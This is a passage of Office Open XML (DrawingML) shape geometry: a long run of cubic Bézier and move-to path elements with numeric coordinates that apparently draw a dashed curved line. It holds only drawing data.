                  <a:cubicBezTo>
                    <a:pt x="1379" y="54"/>
                    <a:pt x="1385" y="56"/>
                    <a:pt x="1392" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1394" y="59"/>
                    <a:pt x="1396" y="58"/>
                    <a:pt x="1397" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1398" y="54"/>
                    <a:pt x="1396" y="51"/>
                    <a:pt x="1394" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1388" y="49"/>
                    <a:pt x="1381" y="47"/>
                    <a:pt x="1375" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1373" y="44"/>
                    <a:pt x="1371" y="45"/>
                    <a:pt x="1370" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1369" y="50"/>
                    <a:pt x="1371" y="52"/>
                    <a:pt x="1373" y="52"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1334" y="42"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1341" y="43"/>
                    <a:pt x="1347" y="45"/>
                    <a:pt x="1354" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1356" y="47"/>
                    <a:pt x="1358" y="46"/>
                    <a:pt x="1358" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1359" y="42"/>
                    <a:pt x="1358" y="40"/>
                    <a:pt x="1356" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1349" y="37"/>
                    <a:pt x="1343" y="36"/>
                    <a:pt x="1336" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1334" y="33"/>
                    <a:pt x="1332" y="35"/>
                    <a:pt x="1331" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1331" y="39"/>
                    <a:pt x="1332" y="41"/>
                    <a:pt x="1334" y="42"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1295" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1302" y="34"/>
                    <a:pt x="1308" y="35"/>
                    <a:pt x="1315" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1317" y="37"/>
                    <a:pt x="1319" y="36"/>
                    <a:pt x="1320" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1320" y="32"/>
                    <a:pt x="1319" y="30"/>
                    <a:pt x="1317" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1310" y="28"/>
                    <a:pt x="1304" y="26"/>
                    <a:pt x="1297" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1295" y="24"/>
                    <a:pt x="1293" y="26"/>
                    <a:pt x="1292" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1292" y="30"/>
                    <a:pt x="1293" y="32"/>
                    <a:pt x="1295" y="32"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1256" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1263" y="26"/>
                    <a:pt x="1269" y="27"/>
                    <a:pt x="1276" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1278" y="29"/>
                    <a:pt x="1280" y="27"/>
                    <a:pt x="1281" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1281" y="23"/>
                    <a:pt x="1280" y="21"/>
                    <a:pt x="1277" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1271" y="19"/>
                    <a:pt x="1264" y="18"/>
                    <a:pt x="1258" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1256" y="16"/>
                    <a:pt x="1253" y="18"/>
                    <a:pt x="1253" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1253" y="22"/>
                    <a:pt x="1254" y="24"/>
                    <a:pt x="1256" y="25"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1217" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1224" y="19"/>
                    <a:pt x="1230" y="20"/>
                    <a:pt x="1237" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1239" y="22"/>
                    <a:pt x="1241" y="20"/>
                    <a:pt x="1241" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1242" y="16"/>
                    <a:pt x="1240" y="14"/>
                    <a:pt x="1238" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1231" y="12"/>
                    <a:pt x="1225" y="11"/>
                    <a:pt x="1218" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1216" y="10"/>
                    <a:pt x="1214" y="12"/>
                    <a:pt x="1214" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1213" y="16"/>
                    <a:pt x="1215" y="18"/>
                    <a:pt x="1217" y="18"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1177" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1184" y="14"/>
                    <a:pt x="1191" y="15"/>
                    <a:pt x="1197" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1199" y="16"/>
                    <a:pt x="1201" y="15"/>
                    <a:pt x="1202" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1202" y="10"/>
                    <a:pt x="1200" y="8"/>
                    <a:pt x="1198" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1191" y="7"/>
                    <a:pt x="1185" y="6"/>
                    <a:pt x="1178" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1176" y="6"/>
                    <a:pt x="1174" y="7"/>
                    <a:pt x="1174" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1174" y="12"/>
                    <a:pt x="1175" y="13"/>
                    <a:pt x="1177" y="14"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1138" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1144" y="11"/>
                    <a:pt x="1151" y="11"/>
                    <a:pt x="1157" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1160" y="12"/>
                    <a:pt x="1162" y="10"/>
                    <a:pt x="1162" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1162" y="6"/>
                    <a:pt x="1160" y="4"/>
                    <a:pt x="1158" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1151" y="3"/>
                    <a:pt x="1145" y="3"/>
                    <a:pt x="1138" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1136" y="2"/>
                    <a:pt x="1134" y="4"/>
                    <a:pt x="1134" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1134" y="8"/>
                    <a:pt x="1135" y="10"/>
                    <a:pt x="1138" y="10"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1098" y="9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1104" y="9"/>
                    <a:pt x="1111" y="9"/>
                    <a:pt x="1118" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1120" y="9"/>
                    <a:pt x="1122" y="8"/>
                    <a:pt x="1122" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1122" y="3"/>
                    <a:pt x="1120" y="1"/>
                    <a:pt x="1118" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1111" y="1"/>
                    <a:pt x="1105" y="1"/>
                    <a:pt x="1098" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1096" y="1"/>
                    <a:pt x="1094" y="2"/>
                    <a:pt x="1094" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1094" y="7"/>
                    <a:pt x="1095" y="9"/>
                    <a:pt x="1098" y="9"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1058" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1061" y="8"/>
                    <a:pt x="1065" y="8"/>
                    <a:pt x="1069" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1072" y="8"/>
                    <a:pt x="1075" y="8"/>
                    <a:pt x="1078" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1080" y="8"/>
                    <a:pt x="1082" y="7"/>
                    <a:pt x="1082" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1082" y="2"/>
                    <a:pt x="1080" y="0"/>
                    <a:pt x="1078" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1075" y="0"/>
                    <a:pt x="1072" y="0"/>
                    <a:pt x="1069" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1065" y="0"/>
                    <a:pt x="1061" y="0"/>
                    <a:pt x="1058" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1055" y="0"/>
                    <a:pt x="1054" y="2"/>
                    <a:pt x="1054" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1054" y="7"/>
                    <a:pt x="1056" y="8"/>
                    <a:pt x="1058" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1058" y="8"/>
                    <a:pt x="1058" y="8"/>
                    <a:pt x="1058" y="8"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1018" y="9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1025" y="9"/>
                    <a:pt x="1031" y="9"/>
                    <a:pt x="1038" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1040" y="9"/>
                    <a:pt x="1042" y="7"/>
                    <a:pt x="1042" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1042" y="2"/>
                    <a:pt x="1040" y="1"/>
                    <a:pt x="1038" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1031" y="1"/>
                    <a:pt x="1024" y="1"/>
                    <a:pt x="1018" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1015" y="2"/>
                    <a:pt x="1014" y="3"/>
                    <a:pt x="1014" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1014" y="8"/>
                    <a:pt x="1016" y="10"/>
                    <a:pt x="1018" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1018" y="9"/>
                    <a:pt x="1018" y="9"/>
                    <a:pt x="1018" y="9"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="978" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="985" y="12"/>
                    <a:pt x="991" y="11"/>
                    <a:pt x="998" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1000" y="10"/>
                    <a:pt x="1002" y="9"/>
                    <a:pt x="1002" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1002" y="4"/>
                    <a:pt x="1000" y="2"/>
                    <a:pt x="997" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="991" y="3"/>
                    <a:pt x="984" y="4"/>
                    <a:pt x="977" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="975" y="4"/>
                    <a:pt x="974" y="6"/>
                    <a:pt x="974" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="974" y="11"/>
                    <a:pt x="976" y="12"/>
                    <a:pt x="978" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="978" y="12"/>
                    <a:pt x="978" y="12"/>
                    <a:pt x="978" y="12"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="938" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="945" y="15"/>
                    <a:pt x="952" y="15"/>
                    <a:pt x="958" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="960" y="14"/>
                    <a:pt x="962" y="12"/>
                    <a:pt x="962" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="962" y="7"/>
                    <a:pt x="960" y="6"/>
                    <a:pt x="957" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="951" y="7"/>
                    <a:pt x="944" y="7"/>
                    <a:pt x="937" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="935" y="9"/>
                    <a:pt x="934" y="11"/>
                    <a:pt x="934" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="934" y="15"/>
                    <a:pt x="936" y="16"/>
                    <a:pt x="938" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="938" y="16"/>
                    <a:pt x="938" y="16"/>
                    <a:pt x="938" y="16"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="899" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="905" y="21"/>
                    <a:pt x="912" y="20"/>
                    <a:pt x="919" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="921" y="19"/>
                    <a:pt x="922" y="16"/>
                    <a:pt x="922" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="922" y="12"/>
                    <a:pt x="920" y="11"/>
                    <a:pt x="917" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="911" y="12"/>
                    <a:pt x="904" y="13"/>
                    <a:pt x="898" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="895" y="14"/>
                    <a:pt x="894" y="16"/>
                    <a:pt x="894" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="895" y="21"/>
                    <a:pt x="897" y="22"/>
                    <a:pt x="899" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="899" y="22"/>
                    <a:pt x="899" y="22"/>
                    <a:pt x="899" y="22"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="860" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="866" y="28"/>
                    <a:pt x="873" y="26"/>
                    <a:pt x="879" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="881" y="25"/>
                    <a:pt x="883" y="23"/>
                    <a:pt x="882" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="882" y="18"/>
                    <a:pt x="880" y="17"/>
                    <a:pt x="878" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="871" y="18"/>
                    <a:pt x="865" y="20"/>
                    <a:pt x="858" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="856" y="21"/>
                    <a:pt x="854" y="24"/>
                    <a:pt x="855" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="855" y="28"/>
                    <a:pt x="857" y="29"/>
                    <a:pt x="860" y="29"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="821" y="37"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="827" y="36"/>
                    <a:pt x="834" y="34"/>
                    <a:pt x="840" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="842" y="33"/>
                    <a:pt x="844" y="30"/>
                    <a:pt x="843" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="843" y="26"/>
                    <a:pt x="841" y="25"/>
                    <a:pt x="838" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="832" y="27"/>
                    <a:pt x="825" y="28"/>
                    <a:pt x="819" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="817" y="30"/>
                    <a:pt x="815" y="32"/>
                    <a:pt x="816" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="816" y="37"/>
                    <a:pt x="819" y="38"/>
                    <a:pt x="821" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="821" y="37"/>
                    <a:pt x="821" y="37"/>
                    <a:pt x="821" y="37"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="782" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="788" y="46"/>
                    <a:pt x="795" y="44"/>
                    <a:pt x="801" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="803" y="42"/>
                    <a:pt x="805" y="40"/>
                    <a:pt x="804" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="804" y="35"/>
                    <a:pt x="801" y="34"/>
                    <a:pt x="799" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="793" y="36"/>
                    <a:pt x="786" y="38"/>
                    <a:pt x="780" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="40"/>
                    <a:pt x="777" y="43"/>
                    <a:pt x="777" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="47"/>
                    <a:pt x="780" y="48"/>
                    <a:pt x="782" y="48"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="744" y="59"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="750" y="57"/>
                    <a:pt x="757" y="55"/>
                    <a:pt x="763" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="52"/>
                    <a:pt x="766" y="50"/>
                    <a:pt x="766" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="46"/>
                    <a:pt x="763" y="45"/>
                    <a:pt x="761" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="754" y="47"/>
                    <a:pt x="748" y="49"/>
                    <a:pt x="741" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="739" y="52"/>
                    <a:pt x="738" y="54"/>
                    <a:pt x="739" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="739" y="59"/>
                    <a:pt x="742" y="60"/>
                    <a:pt x="744" y="59"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="706" y="72"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="712" y="70"/>
                    <a:pt x="719" y="67"/>
                    <a:pt x="725" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="65"/>
                    <a:pt x="728" y="62"/>
                    <a:pt x="727" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="58"/>
                    <a:pt x="724" y="57"/>
                    <a:pt x="722" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="716" y="60"/>
                    <a:pt x="710" y="62"/>
                    <a:pt x="703" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="701" y="65"/>
                    <a:pt x="700" y="67"/>
                    <a:pt x="701" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="702" y="72"/>
                    <a:pt x="704" y="73"/>
                    <a:pt x="706" y="72"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="669" y="86"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="675" y="84"/>
                    <a:pt x="681" y="81"/>
                    <a:pt x="687" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="689" y="78"/>
                    <a:pt x="690" y="76"/>
                    <a:pt x="690" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="689" y="72"/>
                    <a:pt x="687" y="71"/>
                    <a:pt x="685" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="678" y="74"/>
                    <a:pt x="672" y="76"/>
                    <a:pt x="666" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="664" y="80"/>
                    <a:pt x="663" y="82"/>
                    <a:pt x="664" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="664" y="86"/>
                    <a:pt x="667" y="87"/>
                    <a:pt x="669" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="669" y="86"/>
                    <a:pt x="669" y="86"/>
                    <a:pt x="669" y="86"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="632" y="102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="638" y="99"/>
                    <a:pt x="644" y="97"/>
                    <a:pt x="651" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653" y="93"/>
                    <a:pt x="653" y="91"/>
                    <a:pt x="653" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="652" y="87"/>
                    <a:pt x="649" y="86"/>
                    <a:pt x="647" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="641" y="89"/>
                    <a:pt x="635" y="92"/>
                    <a:pt x="629" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="96"/>
                    <a:pt x="626" y="98"/>
                    <a:pt x="627" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="628" y="102"/>
                    <a:pt x="630" y="103"/>
                    <a:pt x="632" y="102"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="596" y="119"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="602" y="116"/>
                    <a:pt x="608" y="113"/>
                    <a:pt x="614" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="109"/>
                    <a:pt x="617" y="107"/>
                    <a:pt x="616" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="103"/>
                    <a:pt x="613" y="102"/>
                    <a:pt x="611" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="605" y="106"/>
                    <a:pt x="599" y="109"/>
                    <a:pt x="593" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="591" y="113"/>
                    <a:pt x="590" y="115"/>
                    <a:pt x="591" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="592" y="119"/>
                    <a:pt x="594" y="120"/>
                    <a:pt x="596" y="119"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="561" y="137"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="567" y="134"/>
                    <a:pt x="573" y="131"/>
                    <a:pt x="579" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="581" y="127"/>
                    <a:pt x="581" y="125"/>
                    <a:pt x="580" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="579" y="121"/>
                    <a:pt x="577" y="120"/>
                    <a:pt x="575" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="569" y="124"/>
                    <a:pt x="563" y="127"/>
                    <a:pt x="557" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="555" y="132"/>
                    <a:pt x="555" y="134"/>
                    <a:pt x="556" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="557" y="138"/>
                    <a:pt x="559" y="139"/>
                    <a:pt x="561" y="137"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="527" y="157"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="532" y="154"/>
                    <a:pt x="538" y="150"/>
                    <a:pt x="544" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="546" y="146"/>
                    <a:pt x="546" y="144"/>
                    <a:pt x="545" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="544" y="140"/>
                    <a:pt x="542" y="139"/>
                    <a:pt x="540" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="534" y="144"/>
                    <a:pt x="528" y="147"/>
                    <a:pt x="522" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="521" y="151"/>
                    <a:pt x="520" y="154"/>
                    <a:pt x="521" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="522" y="158"/>
                    <a:pt x="525" y="158"/>
                    <a:pt x="527" y="157"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="493" y="178"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="498" y="175"/>
                    <a:pt x="504" y="171"/>
                    <a:pt x="510" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="511" y="166"/>
                    <a:pt x="512" y="164"/>
                    <a:pt x="511" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="510" y="160"/>
                    <a:pt x="507" y="160"/>
                    <a:pt x="505" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="500" y="164"/>
                    <a:pt x="494" y="168"/>
                    <a:pt x="488" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="173"/>
                    <a:pt x="486" y="175"/>
                    <a:pt x="487" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="179"/>
                    <a:pt x="491" y="179"/>
                    <a:pt x="493" y="178"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="460" y="201"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="465" y="197"/>
                    <a:pt x="471" y="193"/>
                    <a:pt x="476" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="478" y="188"/>
                    <a:pt x="478" y="186"/>
                    <a:pt x="477" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476" y="182"/>
                    <a:pt x="473" y="181"/>
                    <a:pt x="472" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="466" y="186"/>
                    <a:pt x="461" y="190"/>
                    <a:pt x="455" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="453" y="195"/>
                    <a:pt x="453" y="198"/>
                    <a:pt x="454" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="455" y="201"/>
                    <a:pt x="458" y="202"/>
                    <a:pt x="460" y="201"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="428" y="224"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="220"/>
                    <a:pt x="438" y="216"/>
                    <a:pt x="444" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="445" y="211"/>
                    <a:pt x="446" y="208"/>
                    <a:pt x="444" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="443" y="205"/>
                    <a:pt x="441" y="204"/>
                    <a:pt x="439" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="210"/>
                    <a:pt x="428" y="214"/>
                    <a:pt x="423" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="421" y="219"/>
                    <a:pt x="421" y="222"/>
                    <a:pt x="422" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="423" y="225"/>
                    <a:pt x="426" y="225"/>
                    <a:pt x="428" y="224"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="396" y="249"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="245"/>
                    <a:pt x="407" y="240"/>
                    <a:pt x="412" y="236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="414" y="235"/>
                    <a:pt x="414" y="232"/>
                    <a:pt x="412" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="229"/>
                    <a:pt x="409" y="229"/>
